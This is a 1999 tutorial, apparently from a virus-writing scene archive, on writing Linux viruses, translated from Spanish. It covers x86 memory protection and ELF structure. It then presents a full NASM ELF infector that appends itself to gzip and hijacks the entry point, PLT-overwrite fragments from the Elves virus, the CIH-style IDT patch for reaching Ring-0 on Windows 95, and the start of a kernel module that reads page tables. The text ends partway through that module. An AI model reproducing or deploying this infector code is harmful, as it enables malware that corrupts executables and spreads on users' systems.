,, MMP""MM""YMM `7MM P' MM `7 MM MM MMpMMMb. .gP"Ya MM MM MM ,M' Yb MM MM MM 8M"""""" MM MM MM YM. , .JMML. .JMML JMML.`Mbmmd' `7MMF' `7MF' `7MMF' `7MMF' `MA ,V MM MM VM: ,V `7M' `MF' MM MM .gP"Ya ,6"Yb.`7M' `MF'.gP"Ya `7MMpMMMb. MM. M' `VA ,V' MMmmmmmmMM ,M' Yb 8) MM VA ,V ,M' Yb MM MM `MM A' XMX MM MM 8M"""""" ,pm9MM VA ,V 8M"""""" MM MM :MM; ,V' VA. MM MM YM. , 8M MM VVV YM. , MM MM VF .AM. .MA..JMML. .JMML.`Mbmmd' `Moo9^Yo. W `Mbmmd'.JMML JMML. ,, ,, ,, .g8"""bgd `7MM `7MM mm db .dP' `M MM MM MM dM' ` ,pW"Wq. MM MM .gP"Ya ,p6"bo mmMMmm `7MM ,pW"Wq.`7MMpMMMb. MM 6W' `Wb MM MM ,M' Yb 6M' OO MM MM 6W' `Wb MM MM MM. 8M M8 MM MM 8M"""""" 8M MM MM 8M M8 MM MM `Mb. ,'YA. ,A9 MM MM YM. , YM. , MM MM YA. ,A9 MM MM `"bmmmd' `Ybmd9'.JMML..JMML.`Mbmmd' YMbmd' `Mbmo.JMML.`Ybmd9'.JMML JMML. -- Contact -- https://twitter.com/vxunderground vxug@null.net


  1. Introduction
    1. Foreword by Billy Belcebu
    2. Original Author Introduction
  2. ELF Infection
  3. Resident viruses
    1. Global residency in Ring-0
    2. Global residency in Ring-3
    3. PerProcess residency

NOTE: This article was made using kernel version 2.0.34, where the segment distribution is different from the actual kernel versions like 2.2.XX.


Foreword by Billy Belcebu

Hi, and welcome to the worlds' first ever Virus Writing Guide alike for the LiNUX system. This tutorial is NOT written by me, and my only intention is to translate it to all the viral community in general. If you want to take a look to the original version (that is in spanish) you can find it on my own website (http://beautifulpeople.cjb.net).

The author, who wants to remain anonymous, has shown impressive LiNUX skills and aswell a good assembler level (rare for a LiNUX coder), but he has a problem with his lack of optimization ;)

My conclussions after reading this article are various: LiNUX kicks ass, LiNUX kicks Windoze's ass... You can take a look to its heavy and very intelligent protection: It's almost impossible to achieve Ring-0 (at least not being root), it's impossible to make a Ring-3 global residence (with the impressive mechanism of copy-on-write), and all those details that makes the LiNUX system to be the best choice actually in matter of operative systems. Really.

My english is not very good, but seems that i'm the only one that wants to take the trouble to translate this. Besides, i think that leave this jewel only in spanish is an unforgivable sin. So, here i am, translating it 4 u ;)


© 1999 Mr Anonymous [ Original Article ]

© 1999 Billy Belcebu/iKX [ Translation ]

PS: I have the author permission for this. Don't blame me with copyrightz...

Introduction: Memory protection

The neverending question, Why aren't viruses for linux?. It seems that the viral community, accustomed to Real Mode systems (DOS), find that is hard to adapt themselves to protected mode systems. Even for Win95/98, systems with important dessign problems, there exists moreless 30 viruses where the great majority are non-resident viruses or VxD infectors (Ring-0 devices).

It seems that the answer is in the important memory protection implemented by Linux.

Systems like Win95/NT use a memory dessign with a limited use of segments. In this systems with user and kernel selectors, we can directionate all the virtual space, i.e. from 0x00000000 to 0xFFFFFFFF (That doesn't means that you can write to all the memory, because the memory pages also have some protection attributes).

However in Linux the dessign is very different, there are two different zones very differenced by segmentation, one dedicated to user processes, that go from 0x00000000 to 0xC0000000 and other for the kernel, that go from 0xC0000000 to 0xFFFFFFFF.

Let's see a dump of registers with GDB, taken from the beginning of the execution of a command like GZIP.

        (gdb)info registers

        eax           0x0        0
        ecx           0x1        1
        edx           0x0        0          
        ebx           0x0        0
        ebp           0xbffffd8c     0xbffffd8c
        esi           0xbffffd9c     0xbffffd9c
        edi           0x4000623c     1073766972
        eip           0x8048b10      0x8048b10
        eflags        0x296          662
        cs            0x23           35
        ss            0x2b           43
        ds            0x2b           43           
        es            0x2b           43
        fs            0x2b           43
        gs            0x2b           43

We can see that Linux uses the selector 0x23 for code, and the selector 0x2B for the data. Intel uses 16-bit selectors, the two less significan bits store the RPL (information about the privilege level of that selector, Intel implements 4 protection rings, but the actual operative systems like Win95/NT or Linux use only 2, Ring-0 for the kernel (maximum privilege level) and Ring-3 for the user processes)). The next bit shows where is the descriptor of the segment that contains information about the segment, 0 for the GDT (GLOBAL DESCRIPTOR TABLE) or 1 for the LDT (LOCAL DESCRIPTOR TABLE). The other bits are simply an index of a segment descriptor that will be in the LDT or the GDT according to the information of below.

	Selector [ 14 bits, Index to descriptor ] [ 1 bit, GDT/LDT ] [ 2 bits, RPL ]

Then, if we pass to binary 0x23 we got

	[ 0 0 0 0 0 0 0 0 0 0 0 1 0 0 ] [ 0 ] [ 1 1 ]

So we know that it is a Ring-3 selector (it's used by a process) and also we know that tge information of such segment lies in the GDT, at 4th entry. If we analyze the next descriptor (0x2B) we'll obtain a similar information, but the descriptor will be at 5th entry.

If we take a look to the kernel's code, more concretly in the file called /usr/src/linux/arch/i386/kernel/head.S (painfully in assembler :)) we can appreciate the segment initialization in linux.

 * This gdt setup gives the kernel a 1GB address space at virtual
 * address 0xC0000000 - space enough for expansion, I hope.

        .quad 0x0000000000000000        /* NULL descriptor */
        .quad 0x0000000000000000        /* not used */
        .quad 0xc0c39a000000ffff        /* 0x10 kernel 1GB code at 0xC0000000 */
        .quad 0xc0c392000000ffff        /* 0x18 kernel 1GB data at 0xC0000000 */
        .quad 0x00cbfa000000ffff        /* 0x23 user   3GB code at 0x00000000 */
        .quad 0x00cbf2000000ffff        /* 0x2b user   3GB data at 0x00000000 */
        .quad 0x0000000000000000        /* not used */
        .quad 0x0000000000000000        /* not used */
        .fill 2*NR_TASKS,8,0            /* space for LDT's and TSS's etc */
        .quad 0x00c09a0000000000        /* APM CS    code */
        .quad 0x00809a0000000000        /* APM CS 16 code (16 bit) */
        .quad 0x00c0920000000000        /* APM DS    data */

As you can see, Linux initializes 4 segments: 2 for kernel and 2 for user, depending if they are of code or data. In each entry is stored information like the base address of the segment and its limit, if it's resident in memory or not, the kind of segment, if its code is in 16 or 32 bits. Meanwhile there are an user selector in the DS segment, we can't ever handle an address over 0xC0000000 because we would be out of the memory that can be accessed by the segment, we would receive a SIGSEGV signal and our process would be finished painfully.

I know i can directionate from 0x00000000 to 0xC0000000 but, what can i modify?. Here begins the real protection mechanism. The memory is divided in pages of 4Kb each one in the case of Intel, and each page has its own attributes: if they are read/write, if it's in memory (it can be at disk temporally), if it's of kernel, etc.

All the information about pages in memory is located in a page table that contains descriptors for each mapped page in memory. There is one page table for each process in memory, this makes that each process has its own virtual space and besides, that any other process could access to another one.

This makes possible to load programs in the same memory address, and really it's what it does. Windows 95/98 and Linux do it. In Linux the usual load address is 0x08040000 while in Windows it is 0x00400000.

This page table is pointed by a control register of the processor (the CR3) so it changes with each change of context modifying also the virtual space of the process.

But then, if a process can only handle directionate the perprocess memory, how is it able to execute system calls that reside over 0xC0000000? Intel brings us mechanisms for jump to Ring-0 in a safe way when we need to make system calls. Intel uses two methods: the TRAP GATES and the CALL GATES. Usually are used the TRAP GATES (WinNT/98/95, Linux); even i believe that some other unix systems use the CALL GATES for make the Ring jump.

The Trap Gates occupy one entry in the IDT (INTERRUPT DESCRIPTOR TABLE), and allow the jump to Ring-0 with the generation of one interrupt. For that, the jump address defined in the IDT must have a Ring-0 selector and the DPL (Descriptor Privilege Level) must be 3, allowing an user to execute it. In Linux the interrupt used for the jump is the 0x80, while Win95 uses the int 0x30, for example.

Let's see the disassembly of the getpid function of the LIBC library. For that we create a C file like this:

#include <unistd.h>

 void main()
                getpid();        /* I get the PID of the process */

After compile it, we debug the binary file with GDB:


        0x8048480 <main>:        pushl %ebp
        0x8048481 <main+1>:      movl  %esp,%ebp
        0x8048483 <main+3>:      call  0x8048378 <getpid>
        0x8048488 <main+8>:      movl  %ebp,%esp
        0x804848a <main+13>:     popl  %ebp
        0x804848b <main+11>:     ret

As you can see the call to getpid is dessigned in Linux (and in other systems) as a CALL to a special section inside the binary file (0x8048378). There we could find a jump to the desired library function. This jumps are built in memory by the OS for choose the dynamic links with the libraries. With this, any file could execute exported functions of others, if it's pointed in this way by the information in the ELF header. Let's continue debugging:

        (gdb)disass getpid

        0x40073000 <__getpid>:   pushl %ebp 
        0x40073001 <__getpid+1>: movl  %esp,%ebp
        0x40073003 <__getpid+3>: pushl %ebx
        0x40073004 <__getpid+4>: movl  $0x14,%eax
        0x40073009 <__getpid+9>: int   $0x80

These are the first instructions of the getpid library call. Its work is simple: we are only preparing a jump to Ring-0. If the function would have some parameters, it would have prepared the registers for that parameters before doing the jump to Ring-0. It would have put in EAX the number of function, and it would have called to the int 0x80. As you can see, the code of the libraries is in the PerProcess memory, below 0xC0000000, so it's Ring-3 code and it lacks of privileges for access ports,to privileged memory areas, etc. That's the reason because the libraries are really intermediary between the calls made by the processes and the calls generated via int 0x80

All the system calls that need to jump to Ring-0 will use the int 0x80, and the int 0x80 has only a descriptor, we'll jump always to the same memory address. That makes us to need to put in EAX register the number of the function we want to call to. In Ring-0, the kernel evaluates the value of EAX for know what function if has to satisfy, and according to its value, it would jump to one function or to another using an internal table of pointers to function called sys_call_table. The list of function accedped with the int 0x80 is in the file /usr/include/sys/syscall.h

With the execution of an int 0x80 the processor will change the selector of code active. It'll change from the selector 0x23 to 0x10, so we'll pass from directionate from 0x00000000-0xC0000000 to 0xC0000000-0xFFFFFFFF.

The next method of jump, rarely used, is based in an entry in the GDT or excepcionally in the LDT. There we'll define what's denominated a CALL GATE, that allows jumps to Rings of more privilege via the instruction CALL FAR or JUMP FAR of assembler.

ELF infection

In Linux there are two formats of executables: a.out and ELF; however every executable and library of Linux nowadays use the second format. The ELF format is very powerful, and contains information for handle applications under different processors. It contains information about the processor where the executable was compiled, or if it has to use little endian or big endian. As it is a format of processors in extended mode, besides the information about the physical sections that are in the file, there is some information about how the OS has to map the file in memory.

The ELF file has one first part that occupies the first 0x24 bytes of the executable, and contains, among other things, a mark 'ELF' for show us that it is an executable file with ELF format; the kind of processor, the base address (that is the virtual address of the first instruction that will be executed in the file) and after, 2 pointers to 2 tables.

The first table pointed is the Program Header (located physically after the ELF header) that contains entries with information about how will be mapped in memoy the file. Each entry will contain the size of each segment in the memory and in the file, also the address of the init of the segment.

The next table is the Section Header, and it's just at the end of the file. It'll contain information about each logical section, it'll also contain protection attributes, but this information won't be used for map the code of the file in memory.

With the GDB command 'maintenance info sections' we can see the section structure with all the protection attributes of each section. If you take a look at it, you'll realize that all the readonly sections are situated the first ones, and the read/write sections, altogether at the end. This is necessary because the code sections are mapped altogether in memory in consecutive pages by means of an entry in the program header. That's why all the section that share the same protection attributes will be able to share memory pages, meanwhile the sections with different attributes won't be able to do so. With this we avoid the internal fragmentation in the executables, because if every section would have to map separately, the last page of every section would be empty, and many space would be wasted.

Also look to the last readonly page doesn't share a page with the first one with readwrite attributes. The dump of this instruction with a command like gzip would be the following:

 (gdb)maintenance info sections
 Exec file:
 '/bin/gzip', file type elf32-i386.
 0x080480d4->0x080480e7 at 0x000000d4: .interp ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x080480e8->0x08048308 at 0x000000e8: .has ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048308->0x08048738 at 0x00000308: .dynsym ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048738->0x08048956 at 0x00000738: .dynstr ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048998->0x08048b08 at 0x00000958: .rel.bss ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08048b10->0x08048b18 at 0x00000b10: .init ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08048b18->0x08048e08 at 0x00000b18: .plt ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08048e10->0x08050dac at 0x00000e10: .text ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08050db0->0x08050db8 at 0x00008db0: .fini ALLOC LOAD READONLY CODE HAS_CONTENTS
 0x08050db8->0x08051f25 at 0x00008db8: .rodata ALLOC LOAD READONLY DATA HAS_CONTENTS
 0x08052f28->0x08053960 at 0x00009f28: .data ALLOC LOAD DATA HAS_CONTENTS
 0x08053960->0x08053968 at 0x0000a960: .ctors ALLOC LOAD DATA HAS_CONTENTS
 0x08053968->0x08053968 at 0x0000a968: .dtors ALLOC LOAD DATA HAS_CONTENTS
 0x08053970->0x08053a34 at 0x0000a970: .got ALLOC LOAD DATA HAS_CONTENTS
 0x08053a34->0x08053abc at 0x0000aa34: .dynamic ALLOC LOAD DATA HAS_CONTENTS
 0x08053abc->0x080a4078 at 0x0000aabc: .bss ALLOC
 0x00000000->0x00000178 at 0x0000aabc: .comment READONLY HAS_CONTENTS
 0x00000178->0x000002b8 at 0x0000ac34: .note READONLY HAS_CONTENTS

Take a look to that curious jump between .rodata and .data sections caused by all that i exposed before. This command allows you to visialize how will be in memory the program, but its information in not important for its load. We won't even need to modify the section header for insert more executable code in the file. The Program Header is the true informer of the load process. It contains 5 entries, but it's possible to insert more.

So one solution for insert more executable code could be the expanding of the data segment. This is problematic, because if we copy all the viric code to the end of the executable, i.e. just after the section header, and we expand the entry of the Program Header that corresponds with the data segment, the viral code would overwrite one logical section of the archive, the .bss section. As we had seen with the gdb dump, the .bss section is the last one that is part of the space of the process, and contains the ALLOC attribute, however it doesn't contains the LOAD attribute, so it doesn't load data from the file. This is caused by the fact that the .bss section contains uninitialized data (still) by the host code. If the viric code is mapped over that section is not very problematic, because the virus will be executed before the infected host, so after the virus execution, the host wouldn't care about it. This section, at load time, if filled of zeroes, so a bad programming, like suppose an uninitialized variable set to 0, would show the presence of the virus. In any case,the virus can avoid this copying itself to any other memory address, and filling its old position in .bss with zeroes.

Another possibility could be to create another entry in the program header, but we would have to shift almost all the archive, and this would take too much infection time.

;                      Linux ELF file infection
; Compile with:
;            nasm -f elf hole.asm -o hole.o
;            gcc hole.o -o hole

        [section .text]

        [global main]


        pusha                                   ; Beginning of the virus
                                                ; Push all the parameters
        call    getdelta
        pop     ebp
        sub     ebp,getdelta      
        mov     eax,125                         ; I modify the attributes with
        lea     ebx,[ebp+main]                  ; mprotect for write in protec-
                                                ; ted pages
        and     ebx,0xFFFFF000                  ; Round up to pages
        mov     ecx,03000h                      ; r|w|x attributes
        mov     edx,07h                         ; We will only need this in
        int     80h                             ; the 1st gen, because we'll
                                                ; copy us in the data section
        mov     ebx,01h
        lea     ecx,[ebp+texto]
        mov     edx,0Ch                         ; Show a Hello World with a
        call    sys_write                       ; write to stdout
        mov     eax,05
        lea     ebx,[ebp+archivo]               ; open file to infect (./gzip)
        mov     ecx,02                          ; read/write
        int     80h
        mov     ebx,eax                         ; Handle in EBX
        xor     ecx,ecx
        xor     edx,edx                         ; Go to beginning of file
        call    sys_lseek
        lea     ecx,[ebp+Elf_header]            ; Read the ELF header to our
        mov     edx,24h                         ; variable
        call    sys_read
        cmp     word [ebp+Elf_header+8],0xDEAD  ; Check for previous infection
        jne     infectar
        jmp     salir
        mov     word [ebp+Elf_header+8],0xDEAD
                                                ; The mark is on the 2 first
                                                ; fill bytes in the ident struc

        mov     ecx,[ebp+e_phoff]               ; e_phoff is a ptr to the PH
        add     ecx,8*4*3                       ; Obtain 3rd entry of data seg
        push    ecx
        xor     edx,edx
        call    sys_lseek                       ; Go to that position
        lea     ecx,[ebp+Program_header]        ; Read the entry
        mov     edx,8*4                  
        call    sys_read
        add     dword [ebp+p_filez],0x2000      ; increase segment size in
        add     dword [ebp+p_memez],0x2000      ; memory and in the file
; The size to add must be superior to the size of the virus, because besides
; copy the virus, we have also to copy the section table, located before
; and it is not mapped into mem by default. It could be shifted (for avoid
; copying it) but for simplycity reasons i don't do that.

        pop     ecx
        xor     edx,edx
        call    sys_lseek                       ; back to entry position
        lea     ecx,[ebp+Program_header]
        mov     edx,8*4
        call    sys_write                       ; Write entry to the file

        xor     ecx,ecx
        mov     edx,02h
        call    sys_lseek                       ; Go to file end

; EAX = File Size, that will be phisical offset of the virus
        mov     ecx,dword [ebp+oldentry]
        mov     dword [ebp+temp],ecx

        mov     ecx,dword [ebp+e_entry]
        mov     dword [ebp+oldentry],ecx

        sub     eax,dword [ebp+p_offset]
        add     dword [ebp+p_vaddr],eax
        mov     eax,dword [ebp+p_vaddr]         ; EAX = New entrypoint
        mov     dword [ebp+e_entry],eax
; These are the calculations of the new entry address, that will point to the
; code of the virus. For calculate the virtual address of the virus in memory
; i move the pointer to the end of the file with lseek, so the EAX register
; will have the phisical size of the file (i.e. the physical position of the
; virus in the file).
; If to that position i substract the physical position of the beginning of
; the data segment, i will have the virus position relative to the beginning
; of the data segment, and if i add to it the virtual address of the segment
; i will obtain the virtual address of the virus in memory.

        lea     ecx,[ebp+main]
        mov     edx,virend-main
        call    sys_write                       ; Write the virus to the end

        xor     ecx,ecx
        xor     edx,edx
        call    sys_lseek                       ; Set pointer to beginning of
                                                ; the file
        lea     ecx,[ebp+Elf_header]
        mov     edx,24h
        call    sys_write                       ; Modify header with new EIP

        mov     ecx,dword [ebp+temp]
        mov     dword [ebp+oldentry],ecx
salir:  mov     eax,06                          ; Close the file
        int     80h
        db      068h                            ; Opcode of a PUSH
        dd      hoste                           ; back to infected program

sys_read:                                       ; EBX = Must be File Handle
        mov     eax,3
        int     80h
sys_write:                                      ; EBX = Must be File Handle
        mov     eax,4
        int     80h
sys_lseek:                                      ; EBX = Must be File Handle
        mov     eax,19
        int     80h

dir     dd      main
        dw      010h
archivo db      "./gzip",0                      ; File to infect
datos   db      00h  

temp    dd      00h                             ; Save oldentry temporally

;**************** Data Zone *************************************************

newentry        dd 00h                          ; New virii EIP
newfentry       dd 00h
myvaddr         dd 00h
texto           db 'HELLO WORLD',0h

e_ident:     db 00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h,00h          
e_type:      db 00h,00h
e_machine:   db 00h,00h
e_version:   db 00h,00h,00h,00h
e_entry:     db 00h,00h,00h,00h
e_phoff:     db 00h,00h,00h,00h
e_shoff:     db 00h,00h,00h,00h          
e_flags:     db 00h,00h,00h,00h
e_ehsize:    db 00h,00h
e_phentsize: db 00h,00h
e_phnum:     db 00h,00h
e_shentsize: db 00h,00h
e_shnum:     db 00h,00h
e_shstrndx:  db 00h,00h                
jur:         db 00h,00h,00h,00h

p_type       db 00h,00h,00h,00h
p_offset     db 00h,00h,00h,00h
p_vaddr      db 00h,00h,00h,00h
p_paddr      db 00h,00h,00h,00h        
p_filez      db 00h,00h,00h,00h
p_memez      db 00h,00h,00h,00h
p_flags      db 00h,00h,00h,00h
p_align      db 00h,00h,00h,00h
sh_name      db 00h,00h,00h,00h
sh_type      db 01h,00h,00h,00h
sh_flags     db 03h,00h,00h,00h      ;alloc
sh_addr      db 00h,00h,00h,00h
sh_offset    db 00h,00h,00h,00h
sh_size      dd (virend-main)*2
sh_link      db 00h,00h,00h,00h
sh_info      db 00h,00h,00h,00h
sh_addralign db 01h,00h,00h,00h
sh_entsize   db 00h,00h,00h,00h



If we execute this in a directory where is the gzip file, we will obtain the following message in the screen:


If we execut the gzip, we will obtain this:

 HELLO WORLDgzip: compressed data not written to a terminal. Use -f to force compression.
 For help, type:gzip -h

As you can see,the viral code is executed before the host, and after that it returns to it the control without any kind of dificulty.

However there are other methods that allow the infection without expanding any section of the Program Header. The Staog virus and the Elves virus use alternative methods.

Staog, for example, overwrites the entrypoint of the host with the code of the virus, and the overwritten code is copied to the end of the host. The virus, when receives the control at the execution moment, opens the file (for know the name it takes a look in the stack),takes the code of the virus and make a temporal file in the /tmp directory. After doing that, it calls to fork and while an execution thread is executing the viral code of the temporal archive by meand of execve, other execution thread copies that code to the stack of the program and give the control to that code, that will rebuild the code of the host, and return the control to the original entrypoint.

Elves, however, made by Super of the group 29A, uses a method much more advanced that makes perprocess residency, and avoids that the infected files grow up in size (cavity infection).

NOTE: For more information about perprocess residecy and the structure and use of the PLT, take a look to the article of perprocess residency.

The method consists in introduce the viral code in the PLT. The PLT is a necessary structure of the executable that allows the dynamic link of the functions. For that it doesn't move the PLT to other part of the executable or anything similar, the viral code overwrites it, but it continues working perfectly.

As i will explain in the article about PerProcess residency, there're 2 ways to make a call to a library: by means of the dynamic linker (when we don't know what's the address of the function), or directly with a specific entry for that function in the PLT (when we've already obtained in the GOT the address). After Elves infection, the second method is disabled, and all the calls are made by means of the dynamic linker. The virus overwrites from the second entry, leaving untouched the first one (the one that makes the jump to the dynamic linker).

As we can see in the article about PerProcess residency, an entry in the PLT has the following form:

       jmp     *address_of_GOT
        pushl   entry_in_reloc                  ; Necessary for the D.L. for
        jmp     first_PLT_entry                 ; know what function needs

As you can see, it's not a very optimized code, the first jump would occupy 5 bytes, the push other 5 bytes, and the next jump another 5 bytes, so the entry would have 15 bytes. So the virus is divided in blocks of 15 bytes, and this allows a sequential execution of the code in a normal way, but in the case that we try to make a jump to the beginning of a PLT entry, it would found a jmp previous_PLT_entry codified only with 2 bytes, with the opcodex 0xEB, 0xEE.

Let's see an example:

        pushl %eax
        call get_delta

        popl %edi
        enter $Stat_size,$0x0
        movl (Pushl+Pushal+Pushl)(%ebp),%eax

.byte 0x83
.byte 0xeb,0xee

        leal -0x7(%edi),%esi
        addl -0x4(%eax),%eax
        subl %esi,%eax
        shrl %eax
        movl %eax,(Pushl+Pushal)(%ebp)

.byte 0x83                 ; If we execute sequentially this code, we will
fake_plt_entry3:           ; execute the opcodes 0x83,0xEB,0xDE as if it was
.byte 0xeb,0xde            ; an only one opcode, so we would execute the
                           ; opcode sub ebx,-22
                           ; But if we make a system call, this jumps to the
                           ; 3rd entry of the PLT. The processor would find
                           ; the opcodes 0xEB,0xDE, that is the opcode of a
                           ; jmp fake_plt_entry2

By means of that, when a jump to any PLT entry is done, the execution thread would find miraculously 0xEB opcodes, that will go making little jumps until the virus_start label. From here, the virus will be execute sequentially garbage opcodes like sub ebx,-22 that really are hiding a jmp PLT_entry, and after trying to infect the first call to each system call, it makes a jump to the first PLT entry, so it jumps to the dynamic linker.

I received the source code of this virus for test it, and painfully, in my Linux version it is not functional (Debian 2.0.34). This is because Super, with his needs of optimizing in space the virus, makes the following code for push the reloc entry and avoid to put a push each entry (that would have make him to break the virus in fragments even smaller):

; This is a generic code for push the entry in the reloc section
        movl (Pushl+Pushal+Pushl)(%ebp),%eax
                                ; in EAX the return value of CALL imm
        leal -0x7(%edi),%esi    ; in ESI the offset to the beginning of PLT
        addl -0x4(%eax),%eax    ; in EAX the value of the immediate
        subl %esi,%eax          ; Substract the two values
        shrl %eax               ; in EAX i will have the reloc entry
        movl %eax,(Pushl+Pushal)(%ebp) ; Push the new value

The dynamic linker need entries in the .reloc.plt section for know what address it needs to resolve. For that, it supposes that the consecutive entries of the PLT will have consecutive entries in the .reloc.plt section, and if fact, that's true. If we take a look to any PLT, the compiler puts in the first PLT a PUSH 0x00, in the second PLT a PUSH 0x08, in the third a PUSH 0x10, and so on. This is not really a problem, the real problem is to suppose that all the calls to the PLT are done with a CALL immediate (being the immediate a 4 bytes value). When we do a CALL in assembler, the processor pushes the return address on the stack (i.e. the address of the next instruction of the call). The virus, as we can see, reads from the stack that value, substracts to it a 4 (the size of the immediate) and reads the value pointed by that address (the next code after the call). To that value, it substracts the PLT address, so we obtain the difference of bytes of the PLT entry we've called to, and the beginning of the PLT, and with that value, it obtains the entry value in the reloc section with a simple rotation opcode. This method is okay if we only make calls with the opcode CALL immediate. This might be true, for example in the newest Linux versions,but for example my Linux version makes jumps to the PLT of the host only with the opcode CALL *EBP also this instruction is not codifies in host's code, it's done by the dynamic linker even before the host takes the control (i still don't know why).

Anyway this method is very interesting and useful.

Resident Viruses

Global residency in Ring-0

The resident viruses in Ring-0 are those that achieve maximum privileges in the processor, and already in Ring-0 they hook the system calls made by all the processes of the system.

For achieve Ring-0 an user process should try to make various things: it could try to modify the IDT for generate a TRAP GATE, modify the GDT or the LDT for generate a CALL GATE, or even patch code in Ring-0, so as our code would receive the execution thread already in Ring-0. Wihtout any doubt, it seems a hard work, because all those structures are or should be protected by the OS.

But in systems like Windows 95, where code like this (used by the CIH virus) allows us to jump to Ring-0 without difficulty:


        .model  flat,STDCALL

extrn   ExitProcess:PROC


idtaddr dd      ?,?


;************* Start of code for achieve Ring-0 *************


        sidt    qword ptr [idtaddr]     ; Obtain limit and address of the IDT
        mov     ebx,dword ptr [idtaddr+2h] ; in EBX the base
        add     ebx,8d*5d               ; Modify int 5 cause i'm gonna use its
                                        ; IDT entry
        lea     edx,[ring0code]         ; in EDX goes the ring0code offset  
        push    word ptr [ebx]          ; Modify IDT entry offset for make
        mov     word ptr [ebx],dx       ; the jump to ring0code when the int
        shr     edx,16d                 ; 5h is executed
        push    word ptr [ebx+6]
        mov     word ptr [ebx+6],dx

        int     5h                      ; Generate the exception

        mov     ebx,dword ptr [idtaddr+2h] ; Resotre entry offset of the IDT
        add     ebx,8d*5h
        pop     word ptr [ebx+6]                  
        pop     word ptr [ebx]
        push    -1
        call    ExitProcess

                                        ; Code executed under Ring-0




        end     startvirii


What makes possible that this code works in Windows? The answer is simple, firstly Windows can directionate with user selectors the kernel memory, also (and besidess it seems incredible) lacks of protection by pagination in addresses superior to 0xC0000000, that lies, as linux, the code executed in Ring-0.

So if we can directionate the IDT memory, and also we can write there, the jump to Ring-0 is easy. In this example we have chosen the int 0x05 because it is already a TRAP GATE in Windows,that's why we only modify the IDT entry and instead jump to the memory address assigned by windows, it would jump to our label ring0code inside the perprocess memory of our process.

However, in Linux we can't directionate the user memory with Ring-0 selectors so we couldn't do the jump in case that we could directionate the kernel memory and the pagination protection would be deactivated, the modification of the IDT wouldn't be enough. If we modify the int 0x5 entry of the IDT for generate a TRAP GATE, we wouldn't be able to use the Ring-0 selector of Linux (0x10). In the IDT we would find the address 0x10:ring0code for make the jump, but that address doesn't point to the PerProcess memory; in fact the base address of the 0x10 segment is 0xC0000000, really we would be jumping to the address 0xC0000000+ring0code.

Let's see where lies the IDT in Linux. Compile the next code with NASM:

       [extern puts]
        [global main]
        [SECTION .text]

main:   sidt    [datos]         ; Put in datos var the IDT address
        sgdt    [datos]         ; Put in datos var the GDT address
        sldt    [datos]         ; Put in datos var the LDT address
        [SECTION .data]

data_   dd      0x0,0x0

Executing this step by step, and reading the value stores in 'data_', we get the following memory dumps. (0x80495ED = address of 'data_' variable):

        Dump after SIDT

        (gdb)x/2 0x80495ED
        0x80495ed <data_>: 0x501007FF       0x0807C180         
        Dump after SGDT  

        (gdb)x/2 0x80495ED
        0x80495ed <data_>: 0x6880203F       0x0807C010  

        Dump after SLDT

        (gdb)x/2 0x80495ED
        0x80495ed <data_>: 0x688002Af       0x0807C010

The first and the second assembler opcodes return in the first 16 bits of 'data_' the IDT and the GDT limits respectively, and in the next 32 bits the lineal address of that structures. Meanwhile, the SLDT only returns a selector that points to its descriptor inside the GDT (each LDT must have defined a descriptor in the GDT).

So we know that the IDT has as base address 0xC1805010 and its limit is 0x7FF bytes. The GDT will have as base address 0xC0106880 and will have a size of 0x203F bytes. And of the LDT we know that its descriptor is 0x2AF. As we were expecting, the addresses are all above 0xC0000000, so they are well protected from the user-processes.

Another way for access the kernel memory could be to map kernel pages below 0xC0000000, but painfully, that is not possible because the page table is mapped above the 0xC0000000 address, so it can't be modified by Ring-3 processes. Linux maps all the physical memory of your machine parting from the linear address 0xC0000000, or, with another words, the virtual address 0x0 using the kernel segment 0x10. We can build a module for read the CR3 reg, that contains the physical address of the page table, and with that info, visualize the mapped pages. The program would be the following one:

                      Lector de la Tabla de Paginas        


        Format of an entry
       31-12         11-9   7    6    5     2      1    0
       address        OS    4M   D    A    U/S    R/W   P
       If p=1 the page is in memory
       If R/W=0 means that it's readonly
       If U/S=1 means that the page is an user page    
       If A=1 means that the page have been accessed
       If D=1 page dirty
       If 4M=1 it's a 4M page (only for the tdd entry)
       OS is specific of the operative system


#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/errno.h>
#include <linux/mm.h>
#include <asm/system.h>
#include <linux/sched.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <asm/page.h>
#include <asm/pgtable.h>
#ifdef MODULE

extern void *sys_call_table[];
unsigned long *tpaginas;
unsigned long r_cr0;
unsigned long r_cr4;       /* read some interesting registers */

int init_module(void)
  unsigned long *temp;
  int x,y,z;
                          /* Read the physical address of the page table that
                          is matches with the virtual address */

                          /* And btw, i read some interesting processor regs
                          like cr0 and cr4 */

                          /* As we can see, in CR4 is activated the option of
                          4M pages */

                          /* And in CR0 the WP bit active :) */                          
    movl %cr3,%eax
    movl %eax,(tpaginas)
    movl %cr0,%eax
    movl %eax,(r_cr0)
    movl %cr4,%eax
    movl %eax,(r_cr4)
  printk(" The physical and virtual address \n");
  printk(" of the page table is : %x\n",tpaginas);
  printk(" Control Register Cr0: %x\n",r_cr0);
  printk(" Control Register Cr4: %x\n",r_cr4);
  for (z=0;z<90000000;z++){}
if (((unsigned long) *tpaginas & 0x01) == 1)
 printk("Entry %x  -> %x ",x,(unsigned long) *tpaginas & 0xfffff000);  
 printk("      u/s:%d      r/w:%d\n",
        (((unsigned long) *tpaginas & 0x04)>>2),(((unsigned long) *tpaginas & 0x02)>>1));
 printk("      OS:%x  ",((unsigned long) *tpaginas &0xffff ) >>9 );
 printk("   p:%d\n",((unsigned long) *tpaginas & 0x01));

 if ((((unsigned long) *tpaginas & 0x80)>>7)==1)
             printk("In the virtual address ->  %x",x<<22);
             printk(" there is a 4M page \n");
             for (z=0;z<90000000;z++){};
 for (z=0;z<4000000;z++){};

  temp=((unsigned long) *tpaginas & 0xfffff000); /* in temp i read the page
                                                    table address */

  if (temp!=0 && ((unsigned long) *tpaginas & 0x1))
           for (y=0;y<0x3ff;y++)
  if  (((unsigned long) *temp & 0x01) == 1)
  printk("Virtual  %x -> %x ",(x<<22|y<<12),((unsigned long) *temp & 0xfffff000));  
